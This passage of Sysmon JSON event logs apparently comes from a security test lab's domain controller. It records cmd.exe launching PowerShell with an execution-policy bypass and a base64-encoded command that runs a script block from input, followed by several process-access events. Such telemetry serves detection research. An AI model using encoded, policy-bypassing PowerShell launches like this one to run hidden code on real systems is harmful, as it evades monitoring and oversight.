BAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BB-5F25-0000-0020E0610600}","LogonId":"0x661e0","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{41C8662E-20BB-5F25-0000-0010DB640600}","ParentProcessId":"4908","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4371,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-20BB-5F25-0000-0010DB640600}\r\nSourceProcessId: 4908\r\nSourceThreadId: 5084\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010AE650600}\r\nTargetProcessId: 2176\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-20BB-5F25-0000-0010DB640600}","SourceProcessId":"4908","SourceThreadId":"5084","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010AE650600}","TargetProcessId":"2176","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4372,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BB-5F25-0000-0010AE650600}\r\nTargetProcessId: 2176\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BB-5F25-0000-0010AE650600}","TargetProcessId":"2176","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4373,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4374,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4375,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4376,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:51","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4377,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:51.064\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:51.064","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Ev